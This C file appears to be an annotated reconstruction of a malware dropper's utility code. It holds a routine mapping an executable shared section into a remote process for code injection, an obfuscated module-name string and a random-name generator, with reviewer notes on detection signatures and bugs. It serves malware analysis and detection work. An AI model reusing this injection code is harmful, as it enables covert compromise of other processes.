dropper_Utils.c
  1. #include "5. Utils.h"
  2. #include "9. AssemblyBlock2.h"
  3. #include "A. EncodingAlgorithms.h"
  4. #include "C. CodeBlock.h"
  5.  
  6. #include "config.h"
  7. #include "define.h"
  8.  
  9. // 100% (C) CODE MATCH
// Creates one section and maps it twice: once into the current process
// (*ppLocal) and once into hRemote (*ppRemote). Both views back the same
// pages, so bytes written through the local view are readable - and, with the
// protection requested below, executable - at the remote address.
//
// Detection note: a section created with SECTION_ALL_ACCESS and mapped
// PAGE_EXECUTE_READWRITE into a foreign process handle is the combination that
// user-mode hooks and kernel-side telemetry on ZwCreateSection /
// ZwMapViewOfSection commonly single out; the two map calls on the same
// section handle, one with GetCurrentProcess() and one with hRemote, are the
// observable pair.
//
// Parameters:
//   hRemote   - handle to the target process; its access rights are not
//               checked here.
//   nSize     - requested size in bytes of the section and of both views.
//   ppSection - receives the section handle. The caller owns it; nothing in
//               this function closes it, including on the failure paths.
//   ppLocal   - receives the base address of the local view.
//   ppRemote  - receives the base address of the remote view.
// Returns 0 on success. HAS_FAILED is a macro from the project's headers;
// presumably it returns its second argument (-5) on an NTSTATUS failure -
// confirm in define.h. _F() is likewise a project macro; it looks like an
// indirect resolution of the Zw* export rather than a plain import - confirm.
INT32 SharedMapViewOfSection(HANDLE hRemote, SIZE_T nSize, PHANDLE ppSection, PVOID *ppLocal, PVOID *ppRemote)
{
    SIZE_T iViewSize;           // Size of the map view; passed by address to both map calls, so the API may update it
    NTSTATUS nRet;              // Value returned by the functions
    LARGE_INTEGER liMaxSize;    // Maximum size that can be allocated

    // Copy the values
    iViewSize = nSize;

    // Only the low 32 bits of nSize reach the section size: HighPart is fixed
    // at 0, so on a 64-bit build a SIZE_T above 4 GiB would be truncated here.
    liMaxSize.LowPart  = nSize;
    liMaxSize.HighPart = 0;

    // Create a section and grant all access (read, write, execute)
    nRet = _F(ZwCreateSection)(ppSection, SECTION_ALL_ACCESS, NULL, &liMaxSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, 0);
    HAS_FAILED(nRet, -5)

    // Create the 1st Map View for the local process
    // (ViewShare: the remote view below shares the same pages)
    nRet = _F(ZwMapViewOfSection)(*ppSection, GetCurrentProcess(), ppLocal , NULL, 0, NULL, &iViewSize, ViewShare, 0, PAGE_EXECUTE_READWRITE);
    HAS_FAILED(nRet, -5)

    // Create the 2nd Map View for the remote process
    // On failure here the local view and the section handle are left open.
    nRet = _F(ZwMapViewOfSection)(*ppSection, hRemote            , ppRemote, NULL, 0, NULL, &iViewSize, ViewShare, 0, PAGE_EXECUTE_READWRITE);
    HAS_FAILED(nRet, -5)

    return 0;
}
  36.  
  37. // 99% (C) CODE MATCH
// Appends one segment to the shared section and records where that segment
// will appear in the remote view.
//
// Parameters:
//   ppLocal      - in/out write cursor into the local view; the bytes are
//                  written at *ppLocal.
//   lpRemote     - base address of the remote view of the same section.
//   nGlobalPtr   - in/out running byte offset from the start of the section.
//   lpRemoteInfo - receives the remote address and size of this segment.
//   lpBytes      - source bytes; only read when dwSize is non-zero.
//   dwSize       - number of bytes to copy. With dwSize == 0 nothing is
//                  copied but the segment record is still written with
//                  SegmentSize 0.
// __memcpy is a project helper, not <string.h>; its argument order is assumed
// to match memcpy(dst, src, n) - confirm. No bounds check against the section
// size is performed here; the caller is responsible for nSize.
void CopySegmentIntoSections(PVOID *ppLocal, PVOID lpRemote, INT32 *nGlobalPtr, PSECTION_SEGEMENT_INFO lpRemoteInfo, PVOID lpBytes, DWORD dwSize)
{
    // If bytes has been provided copy them in the shared section
    if(dwSize)
        __memcpy(*ppLocal, lpBytes, dwSize);

    // Update the information for the remote view
    // The remote address is formed as a 32-bit value: lpRemote is cast to
    // DWORD before the offset is added, so this only holds for a 32-bit
    // address space.
    lpRemoteInfo->SegmentAddress = (DWORD)lpRemote + *nGlobalPtr;
    lpRemoteInfo->SegmentSize = dwSize;

    // Update the local information
    // NOTE(review): the arithmetic below is on ppLocal (the PVOID* itself,
    // scaled by sizeof(PVOID)), not on *ppLocal, so the stored cursor does
    // not advance in step with *nGlobalPtr. Documented as found, not changed.
    *ppLocal  = ppLocal + dwSize;
    *nGlobalPtr += dwSize;
}
  52.  
// Encoded form of a wide-character format string. DecodeModuleNameW() (not in
// this file) expands it into the 42-WCHAR buffer that GetRandomModuleName()
// hands to wsprintfW as its format; the identifier suffix suggests the
// plaintext ends in a single %08x that consumes dwRandom - presumably, confirm
// against DecodeModuleNameW. All 23 elements share the high byte 0xAE, which
// is the visible signature of the encoding; the decoder's transform is not
// shown here.
const WORD ENCODED_KERNEL32_DLL_ASLR__08x[23] =
{
    0xAE59, 0xAE57, 0xAE40, 0xAE5C,
    0xAE57, 0xAE5E, 0xAE21, 0xAE20,
    0xAE3C, 0xAE56, 0xAE5E, 0xAE5E,
    0xAE3C, 0xAE53, 0xAE41, 0xAE5E,
    0xAE40, 0xAE3C, 0xAE37, 0xAE22,
    0xAE2A, 0xAE6A, 0xAE12
};
  62.  
  63. // 100% (C) CODE MATCH
// Fills lpInfoBlock->RandomLibraryName and three bookkeeping fields of the
// info block.
//
// Parameters:
//   lpInfoBlock     - block whose RandomLibraryName, OriginalAddress,
//                     UnknownZero0 and AlignAddressesFunction are written.
//   lpszLibraryName - optional. When non-NULL it is copied verbatim into
//                     RandomLibraryName, provided lstrlenW() < 31; the
//                     declared size of RandomLibraryName is not visible in
//                     this file, so the 31 bound is taken on trust. When NULL
//                     a name is generated from the decoded format string and
//                     a counter, retried until GetModuleHandleW() finds no
//                     loaded module of that name - i.e. the result is a name
//                     that is currently NOT loaded in this process.
// Returns 0, or -1 when the supplied name is too long.
//
// GetTickCount() + 3 * thread id is a uniqueness seed, not a random source;
// the generated name is merely collision-free, not unpredictable. The
// OriginalAddress field stores the block's own address XOR X_PTR_KEY (a
// header constant) truncated to 32 bits.
INT32 GetRandomModuleName(GENERAL_INFO_BLOCK *lpInfoBlock, LPCWSTR lpszLibraryName)
{
    WCHAR __KERNEL32_DLL_ASLR_08x[42];    // decoded format string; identifier starts with "__", a namespace reserved for the implementation in C
    DWORD dwRandom;                        // counter for the generated name; only assigned on the generation path

    // If a library name has been passed use it
    if(lpszLibraryName)
    {
        // Length guard for the unbounded lstrcpyW below
        if(lstrlenW(lpszLibraryName) >= 31)
            return -1;

        lstrcpyW(lpInfoBlock->RandomLibraryName, lpszLibraryName);
    }
    else
    {
        dwRandom = GetTickCount() + 3 * GetCurrentThreadId();
        DecodeModuleNameW(ENCODED_KERNEL32_DLL_ASLR__08x, __KERNEL32_DLL_ASLR_08x);

        // wsprintfW has no length bound; the output length is fixed by the
        // format recovered above plus the %08x of dwRandom (presumably - see
        // the table's comment). Loop until the name is not already loaded.
        do
            wsprintfW(lpInfoBlock->RandomLibraryName, __KERNEL32_DLL_ASLR_08x, dwRandom++);
        while(GetModuleHandleW(lpInfoBlock->RandomLibraryName));
    }

    // Pointer truncated to 32 bits before the XOR; X_PTR_KEY comes from the headers
    lpInfoBlock->OriginalAddress = (DWORD)lpInfoBlock ^ X_PTR_KEY;
    lpInfoBlock->UnknownZero0 = 0;
    // Function address stored as a 32-bit integer (32-bit build assumed)
    lpInfoBlock->AlignAddressesFunction = (DWORD)BLOCK4_AlignAddresses;

    return 0;
}